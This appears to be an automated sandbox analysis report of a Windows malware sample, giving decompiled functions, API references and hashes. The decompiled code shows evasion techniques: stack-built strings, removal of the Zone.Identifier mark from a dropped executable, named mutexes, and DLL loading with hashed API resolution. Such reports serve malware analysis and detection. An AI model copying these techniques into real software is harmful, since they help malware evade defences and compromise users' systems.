				 *((intOrPtr*)(_t20 - 0x24)) = 0x5a003a;
				 *((intOrPtr*)(_t20 - 0x20)) = 0x6e006f;
				 *((intOrPtr*)(_t20 - 0x1c)) = 0x2e0065;
				 *((intOrPtr*)(_t20 - 0x18)) = 0x640049;
				 *((intOrPtr*)(_t20 - 0x14)) = 0x6e0065;
				 *((intOrPtr*)(_t20 - 0x10)) = 0x690074;
				 *((intOrPtr*)(_t20 - 0xc)) = 0x690066;
				 *((intOrPtr*)(_t20 - 8)) = 0x720065;
				 *0xcda7cc(_t20 - 0x230, 0x104, _t20 - 0x28, "C:\Windows\SysWOW64\sharedconnect.exe");
				_t19 = DeleteFileW(_t20 - 0x230); // executed
				return _t19;
			}

0x00cd13ab
0x00cd13b2
0x00cd13c5
0x00cd13d2
0x00cd13d9
0x00cd13e0
0x00cd13e7
0x00cd13ee
0x00cd13f5
0x00cd13fc
0x00cd1403
0x00cd1413
0x00cd141c

APIs

_snwprintf.NTDLL ref: 00CD1403
DeleteFileW.KERNELBASE(?), ref: 00CD1413

Strings

:, xrefs: 00CD13C5
e, xrefs: 00CD13E7
o, xrefs: 00CD13D2
e, xrefs: 00CD13D9
t, xrefs: 00CD13EE
e, xrefs: 00CD13FC
f, xrefs: 00CD13F5
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 00CD13B9
I, xrefs: 00CD13E0
%, xrefs: 00CD13AB

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: DeleteFile_snwprintf
String ID: %$:$C:\Windows\SysWOW64\sharedconnect.exe$I$e$e$e$f$o$t
API String ID: 366827715-964619653
Opcode ID: 33669b1a010e92901a24689fe19624fdd28e17ac22e3bc786a5cd71d100b936d
Instruction ID: f18ad2d8b80da4b7b7ca0e9f99b7b54aa3414972eb74fa34cab541d9aa24b103
Opcode Fuzzy Hash: 33669b1a010e92901a24689fe19624fdd28e17ac22e3bc786a5cd71d100b936d
Instruction Fuzzy Hash: 05F0A4B0811258ABDB00DFC1D9886EEBFBAFF04709F10519AD50476600D7B60798CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD110C, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 46
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00CD1113
_snwprintf.NTDLL ref: 00CD1167
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00CD117A
GetLastError.KERNEL32 ref: 00CD1186
CloseHandle.KERNEL32(00000000), ref: 00CD11DA

Strings

X, xrefs: 00CD1134
E, xrefs: 00CD1144
P, xrefs: 00CD111B
P, xrefs: 00CD113D
M, xrefs: 00CD112D
X, xrefs: 00CD114B

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess_snwprintf
String ID: E$M$P$P$X$X
API String ID: 670123879-2257793354
Opcode ID: 555f45e0e5c39d9aea8c7b1ed764c92f19208d3b778fd97cdcf6da51153e7c0c
Instruction ID: 3c8199143a1febfd68207c8a77ef45c9c13058e72ce7562a3b587be53b8d3749
Opcode Fuzzy Hash: 555f45e0e5c39d9aea8c7b1ed764c92f19208d3b778fd97cdcf6da51153e7c0c
Instruction Fuzzy Hash: 6E112D71A01219EBCB109FD5D8887EEBBB8FF44306F154157EA19B2240C7B98B488F96

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6F89, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CD6F89(WCHAR* __eax) {
				struct HINSTANCE__* _t24;
				void* _t26;
				void* _t29;
				void* _t30;

				 *((intOrPtr*)(_t30 - 0x18)) = 0x690077;
				 *((intOrPtr*)(_t30 - 0x14)) = 0x69006e;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x65006e;
				 *((intOrPtr*)(_t30 - 0xc)) = 0x2e0074;
				 *((intOrPtr*)(_t30 - 8)) = 0x6c0064;
				 *((intOrPtr*)(_t30 - 4)) = 0x6c;
				 *((intOrPtr*)(_t30 - 0x54)) = 0x7e9cef33;
				 *((intOrPtr*)(_t30 - 0x50)) = 0xdf5dcd1c;
				 *((intOrPtr*)(_t30 - 0x4c)) = 0xf76ea847;
				 *((intOrPtr*)(_t30 - 0x48)) = 0x210615a6;
				 *((intOrPtr*)(_t30 - 0x44)) = 0xf85bec06;
				 *((intOrPtr*)(_t30 - 0x40)) = 0x210615cc;
				 *((intOrPtr*)(_t30 - 0x3c)) = 0xb415740e;
				 *((intOrPtr*)(_t30 - 0x38)) = 0xf14719d1;
				 *((intOrPtr*)(_t30 - 0x34)) = 0xc68243e2;
				 *((intOrPtr*)(_t30 - 0x30)) = 0x2e7786e5;
				 *((intOrPtr*)(_t30 - 0x2c)) = 0x17af1f7c;
				 *((intOrPtr*)(_t30 - 0x28)) = 0x704a2194;
				 *((intOrPtr*)(_t30 - 0x24)) = 0xa5de13b2;
				 *((intOrPtr*)(_t30 - 0x20)) = 0x5f2aa102;
				 *((intOrPtr*)(_t30 - 0x1c)) = 0xcebb686;
				_t24 = LoadLibraryW(__eax); // executed
				 *0xcda864 = _t24;
				return E00CD1620(_t26, _t24, _t30 - 0x54, _t29, 0xf, 0x7b12011d, 0xcda7e0);
			}

0x00cd6f89
0x00cd6f91
0x00cd6f98
0x00cd6f9f
0x00cd6fa6
0x00cd6fad
0x00cd6fb4
0x00cd6fbb
0x00cd6fc2
0x00cd6fc9
0x00cd6fd0
0x00cd6fd7
0x00cd6fde
0x00cd6fe5
0x00cd6fec
0x00cd6ff3
0x00cd6ffa
0x00cd7001
0x00cd7008
0x00cd700f
0x00cd7016
0x00cd701d
0x00cd7032
0x00cd7044

APIs

LoadLibraryW.KERNELBASE ref: 00CD701D

Strings

d, xrefs: 00CD6FA6
t, xrefs: 00CD6F9F
n, xrefs: 00CD6F98
w, xrefs: 00CD6F89
n, xrefs: 00CD6F91
l, xrefs: 00CD6FAD

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: d$l$n$n$t$w
API String ID: 1029625771-683715976
Opcode ID: 985fc49dd2edbc9653bd2c3530854febd448ec17f0e02dabaadb4d30ca7f0abe
Instruction ID: c2708c5dd6494db6afb832eab74a0612f8d9ee4d921a877350c838ecdbd9df93
Opcode Fuzzy Hash: 985fc49dd2edbc9653bd2c3530854febd448ec17f0e02dabaadb4d30ca7f0abe
Instruction Fuzzy Hash: D411D0B0D02359EBDF10CFD1D9896DCBFB1BB44304F248209E6507A214D3B54A86CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00CD71EA, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 28
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00CD71EA(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x4d005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0xcda7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateMutexW(0, 0, _t23 - 0x98); // executed
				 *0xcda828 = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x00cd71f1
0x00cd71f8
0x00cd7206
0x00cd7210
0x00cd7217
0x00cd721e
0x00cd7225
0x00cd7239
0x00cd7241
0x00cd7250

APIs

_snwprintf.NTDLL ref: 00CD7225
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00CD7239

Strings

a, xrefs: 00CD7210
G, xrefs: 00CD71F1
%, xrefs: 00CD721E
o, xrefs: 00CD7206
\, xrefs: 00CD7217

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID: %$G$\$a$o
API String ID: 451050361-4186019298
Opcode ID: f9ddf036633dad3bd729bdd3cb18d938010ffc5ea3d4e12ce4ae1b0cf434cb11
Instruction ID: d7c0049e83dda4398c84047d345c3497713599ca7498dd5e915c2e31593907a1
Opcode Fuzzy Hash: f9ddf036633dad3bd729bdd3cb18d938010ffc5ea3d4e12ce4ae1b0cf434cb11
Instruction Fuzzy Hash: 7AF089B0911209EBDB40CF949C49BEE7BF8EF04704F00409BEA0CE6241D77186888F99

Uniqueness

Uniqueness Score: -1.00%

Function 00CD716A, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 28
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00CD716A(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x49005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0xcda7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateMutexW(0, 0, _t23 - 0x98); // executed
				 *0xcda834 = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x00cd7171
0x00cd7178
0x00cd7186
0x00cd7190
0x00cd7197
0x00cd719e
0x00cd71a5
0x00cd71b9
0x00cd71c1
0x00cd71d0

APIs

_snwprintf.NTDLL ref: 00CD71A5
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00CD71B9

Strings

a, xrefs: 00CD7190
%, xrefs: 00CD719E
G, xrefs: 00CD7171
\, xrefs: 00CD7197
o, xrefs: 00CD7186

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID: %$G$\$a$o
API String ID: 451050361-4186019298
Opcode ID: 21dcdf89dde01184f7c670a704c58197be542911ab32ee7cf54b58f97a4d8022
Instruction ID: bc76bb3d1e33350500f7ce209d012ef3e8ee991bd89f63170a0cb27bf59f78fe
Opcode Fuzzy Hash: 21dcdf89dde01184f7c670a704c58197be542911ab32ee7cf54b58f97a4d8022
Instruction Fuzzy Hash: D1F012B0A11209EFDB50CFA49C45BEE7FF8EF04705F01409AAA1CE6281D7719698CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7058, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 24
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CD7058(short __eax) {
				struct HINSTANCE__* _t15;
				void* _t17;
				void* _t20;
				void* _t21;

				 *(_t21 - 0x28) = 0x740077;
				 *((short*)(_t21 - 0x10)) = __eax;
				 *((intOrPtr*)(_t21 - 0x24)) = 0x610073;
				 *((intOrPtr*)(_t21 - 0x20)) = 0x690070;
				 *((intOrPtr*)(_t21 - 0x1c)) = 0x320033;
				 *((intOrPtr*)(_t21 - 0x18)) = 0x64002e;
				 *((intOrPtr*)(_t21 - 0x14)) = 0x6c006c;
				 *((intOrPtr*)(_t21 - 0xc)) = 0xe1944b6c;
				 *((intOrPtr*)(_t21 - 8)) = 0xb934f523;
				 *((intOrPtr*)(_t21 - 4)) = 0x5f0c0bb3;
				_t15 = LoadLibraryW(_t21 - 0x28); // executed
				 *0xcda868 = _t15;
				return E00CD1620(_t17, _t15, _t21 - 0xc, _t20, 3, 0x4844c8f, 0xcda81c);
			}

0x00cd7058
0x00cd705f
0x00cd7067
0x00cd706e
0x00cd7075
0x00cd707c
0x00cd7083
0x00cd708a
0x00cd7091
0x00cd7098
0x00cd709f
0x00cd70b4
0x00cd70c6

APIs

LoadLibraryW.KERNELBASE(00740077), ref: 00CD709F

Strings

., xrefs: 00CD707C
3, xrefs: 00CD7075
l, xrefs: 00CD7083
s, xrefs: 00CD7067
p, xrefs: 00CD706E
w, xrefs: 00CD7058

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$3$l$p$s$w
API String ID: 1029625771-4241247243
Opcode ID: c3cd7c12e965ef2bea09d76c66d8877434c0b1d8542400afc7732db02379d856
Instruction ID: 97d23d16a392c937b4f58d179dfd7a79d81822b5a76c80ce877be003af85b3b8
Opcode Fuzzy Hash: c3cd7c12e965ef2bea09d76c66d8877434c0b1d8542400afc7732db02379d856
Instruction Fuzzy Hash: 55F0B7B4D01208DBDF01CFD099597EDBFB5EB44B48F18425AD504BB250D3BA4645CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6DC9, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CD6DC9(WCHAR* __eax) {
				struct HINSTANCE__* _t11;
				void* _t13;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x20)) = 0x680073;
				 *((intOrPtr*)(_t17 - 0x1c)) = 0x6c0065;
				 *((intOrPtr*)(_t17 - 0x18)) = 0x33006c;
				 *((intOrPtr*)(_t17 - 0x14)) = 0x2e0032;
				 *((intOrPtr*)(_t17 - 0x10)) = 0x6c0064;
				 *((intOrPtr*)(_t17 - 0xc)) = 0x6c;
				 *((intOrPtr*)(_t17 - 8)) = 0x4377f0;
				 *((intOrPtr*)(_t17 - 4)) = 0x327f34b2;
				_t11 = LoadLibraryW(__eax); // executed
				 *0xcda854 = _t11;
				return E00CD1620(_t13, _t11, _t17 - 8, _t16, 2, 0x1df027f1, 0xcda678);
			}

0x00cd6dc9
0x00cd6dd1
0x00cd6dd8
0x00cd6ddf
0x00cd6de6
0x00cd6ded
0x00cd6df4
0x00cd6dfb
0x00cd6e02
0x00cd6e17
0x00cd6e29

APIs

LoadLibraryW.KERNELBASE ref: 00CD6E02

Strings

s, xrefs: 00CD6DC9
d, xrefs: 00CD6DE6
e, xrefs: 00CD6DD1
l, xrefs: 00CD6DED
l, xrefs: 00CD6DD8
2, xrefs: 00CD6DDF

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 2$d$e$l$l$s
API String ID: 1029625771-1854679484
Opcode ID: 09eb0991cb40e9ffb906cb5b372b97761bc65bbfd3acaa5493cbfc23499f8e53
Instruction ID: 8eeda2d6e814c4ee7bcc98b03648998d81880144c1712b0f8f199e7995336566
Opcode Fuzzy Hash: 09eb0991cb40e9ffb906cb5b372b97761bc65bbfd3acaa5493cbfc23499f8e53
Instruction Fuzzy Hash: 61F01CB0D41208EADB00CF9099497ADBFB2EB04708F048149A9046A341D7BA02498F95

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6F19, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CD6F19(WCHAR* __eax) {
				struct HINSTANCE__* _t11;
				void* _t13;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x20)) = 0x730075;
				 *((intOrPtr*)(_t17 - 0x1c)) = 0x720065;
				 *((intOrPtr*)(_t17 - 0x18)) = 0x6e0065;
				 *((intOrPtr*)(_t17 - 0x14)) = 0x2e0076;
				 *((intOrPtr*)(_t17 - 0x10)) = 0x6c0064;
				 *((intOrPtr*)(_t17 - 0xc)) = 0x6c;
				 *((intOrPtr*)(_t17 - 8)) = 0x4e606efb;
				 *((intOrPtr*)(_t17 - 4)) = 0x7ab57c39;
				_t11 = LoadLibraryW(__eax); // executed
				 *0xcda860 = _t11;
				return E00CD1620(_t13, _t11, _t17 - 8, _t16, 2, 0x3040902d, 0xcda7d8);
			}

0x00cd6f19
0x00cd6f21
0x00cd6f28
0x00cd6f2f
0x00cd6f36
0x00cd6f3d
0x00cd6f44
0x00cd6f4b
0x00cd6f52
0x00cd6f67
0x00cd6f79

APIs

LoadLibraryW.KERNELBASE ref: 00CD6F52

Strings

d, xrefs: 00CD6F36
e, xrefs: 00CD6F28
v, xrefs: 00CD6F2F
l, xrefs: 00CD6F3D
e, xrefs: 00CD6F21
u, xrefs: 00CD6F19

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: d$e$e$l$u$v
API String ID: 1029625771-2321630952
Opcode ID: b0ff6112916cd95e0e078d87c106dcc72914cc4579c8ab5b8c6aefcefa54fdf3
Instruction ID: 801e2f7b00c890b1afd0d1cd9ccb1ace13b0a898f329e8d52b8898ac6fc2475f
Opcode Fuzzy Hash: b0ff6112916cd95e0e078d87c106dcc72914cc4579c8ab5b8c6aefcefa54fdf3
Instruction Fuzzy Hash: F4F015B0D41309EBDB00CF91E8497AEBBB2EB04709F088569E6047A640D7BA06859FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6EA8, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CD6EA8(short __eax) {
				struct HINSTANCE__* _t12;
				void* _t14;
				void* _t17;
				void* _t18;

				 *(_t18 - 0x1c) = 0x720075;
				 *((short*)(_t18 - 8)) = __eax;
				 *((intOrPtr*)(_t18 - 0x18)) = 0x6d006c;
				 *((intOrPtr*)(_t18 - 0x14)) = 0x6e006f;
				 *((intOrPtr*)(_t18 - 0x10)) = 0x64002e;
				 *((intOrPtr*)(_t18 - 0xc)) = 0x6c006c;
				 *((intOrPtr*)(_t18 - 4)) = 0x925edb63;
				_t12 = LoadLibraryW(_t18 - 0x1c); // executed
				 *0xcda85c = _t12;
				return E00CD1620(_t14, _t12, _t18 - 4, _t17, 1, 0xe7f4d45, 0xcda7d4);
			}

0x00cd6ea8
0x00cd6eaf
0x00cd6eb7
0x00cd6ebe
0x00cd6ec5
0x00cd6ecc
0x00cd6ed3
0x00cd6eda
0x00cd6eef
0x00cd6f01

APIs

LoadLibraryW.KERNELBASE(00720075), ref: 00CD6EDA

Strings

o, xrefs: 00CD6EBE
l, xrefs: 00CD6EB7
l, xrefs: 00CD6ECC
., xrefs: 00CD6EC5
u, xrefs: 00CD6EA8

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$l$l$o$u
API String ID: 1029625771-3769830063
Opcode ID: 8a4367ffd8a99ae009013406a0e42f70363435bf58a4e896974580e4d341e8d9
Instruction ID: 07116bb9c28dd605e966a8b1d3c8cb1feeb2d85fb6236f9baf8c8f7be37450f0
Opcode Fuzzy Hash: 8a4367ffd8a99ae009013406a0e42f70363435bf58a4e896974580e4d341e8d9
Instruction Fuzzy Hash: 92F0C0B0D41209EFDB00DFD098497EDBBB6EB04704F14415AD61467350E7B606859F95

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7DC4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00CD7DC4() {
				void* _t1;
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t1 = MapViewOfFile(); // executed
				_t7 = _t1;
				if(_t7 != 0) {
					 *0xcda838 = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				FindCloseChangeNotification(_t9); // executed
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x00cd7dc4
0x00cd7dca
0x00cd7dce
0x00cd7de4
0x00cd7de9
0x00cd7de9
0x00cd7df0
0x00cd7df8
0x00cd7e00

APIs

MapViewOfFile.KERNELBASE ref: 00CD7DC4
GetFileSize.KERNEL32(?,00000000), ref: 00CD7DD3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00CD7DDD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00CD7DE9
FindCloseChangeNotification.KERNELBASE ref: 00CD7DF0
CloseHandle.KERNEL32 ref: 00CD7DF8

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: File$CloseView$ChangeComputeCrc32FindHandleNotificationSizeUnmap
String ID:
API String ID: 1059615168-0
Opcode ID: 782eabc0a4884e27b9a3c8eb32882d1dbb190de167c4bf900e1df4a98d5073e7
Instruction ID: 78066a365eaa64539f86c0d7e8597b734c00545215f68e063b68f9515bd31e47
Opcode Fuzzy Hash: 782eabc0a4884e27b9a3c8eb32882d1dbb190de167c4bf900e1df4a98d5073e7
Instruction Fuzzy Hash: 35E0EC72206200EBD3411BE4BC8CB6E7B7CEB49612F064017F601C11A0DB7489028A63

Uniqueness

Uniqueness Score: -1.00%

Function 00CD72E0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CD72E0(void* __eflags) {
				void* _t1;
				void* _t2;
				long _t4;
				void* _t5;
				long _t9;
				int _t11;

				_t11 = 0; // executed
				_t2 = L00CD7160(_t1); // executed
				if(_t2 != 0) {
					_t4 = WaitForSingleObject( *0xcda834, 0);
					if(_t4 == 0 || _t4 == 0x80) {
						_t5 = L00CD71E0(_t4); // executed
						if(_t5 != 0) {
							if(L00CD7260(_t5) != 0) {
								_t9 = SignalObjectAndWait( *0xcda82c,  *0xcda828, 0xffffffff, 0);
								if(_t9 == 0 || _t9 == 0x80) {
									_t11 = ResetEvent( *0xcda82c);
								}
							}
							ReleaseMutex( *0xcda834);
							CloseHandle( *0xcda834);
						}
					}
				}
				return _t11;
			}

0x00cd72e1
0x00cd72e3
0x00cd72ea
0x00cd72f3
0x00cd72fb
0x00cd7304
0x00cd730b
0x00cd7314
0x00cd7326
0x00cd732e
0x00cd7343
0x00cd7343
0x00cd732e
0x00cd734b
0x00cd7357
0x00cd7357
0x00cd730b
0x00cd72fb
0x00cd7360

APIs

WaitForSingleObject.KERNEL32(00000000,?,00CD74E0,?,00CD7B68), ref: 00CD72F3
SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00CD74E0,?,00CD7B68), ref: 00CD7326
ResetEvent.KERNEL32(?,00CD74E0,?,00CD7B68), ref: 00CD733D
ReleaseMutex.KERNEL32(?,00CD74E0,?,00CD7B68), ref: 00CD734B
CloseHandle.KERNEL32(?,00CD74E0,?,00CD7B68), ref: 00CD7357

Memory Dump Source

Source File: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000005.00000002.403454733.0000000000CD0000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403468745.0000000000CD9000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.403475669.0000000000CDA000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cd0000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 223d88b9cd1850724e6c90cd7f230d4f8a1f8b0fe533b408130518b408eacd83
Instruction ID: eb4258cbad08c3334c928f8e9d33570b72b99bf5c2334d538b1e3b295e1d8502
Opcode Fuzzy Hash: 223d88b9cd1850724e6c90cd7f230d4f8a1f8b0fe533b408130518b408eacd83
Instruction Fuzzy Hash: E5F0F93110A2119BDF212B30AC09B2E3BA4AB05351B194227FE10D02F1FB31C912F692

Uniqueness

Uniqueness Score: -1.00%

Function 007F2631, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E007F2631(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v72;
				long _v76;
				intOrPtr _v80;
				void* _v84;
				char* _v88;
				DWORD* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr* _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				int _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				int _v168;
				intOrPtr _v172;
				char _v176;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t129;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t181;
				unsigned int _t183;
				intOrPtr _t188;
				void* _t199;
				intOrPtr _t203;

				_t98 = _a4;
				_v76 = 0;
				_v72 = 1;
				asm("movaps xmm0, [0x7f4000]");
				asm("movups [ebp-0x34], xmm0");
				_v80 = _t98;
				_t99 =  *((intOrPtr*)(_t98 + 0x30));
				_v176 = _t99;
				_v84 = _t99;
				_v172 = _v80;
				_v88 =  &_v72;
				_v92 =  &_v76;
				_v96 =  *((intOrPtr*)(_t98 + 0x20));
				_v100 =  *((intOrPtr*)(_t98 + 0x34));
				_v104 = _t98 + 0x30;
				E007F23BE(); // executed
				E007F18EE(_v84);
				_t203 = _t199 - 8 + 8 - 4 + 4;
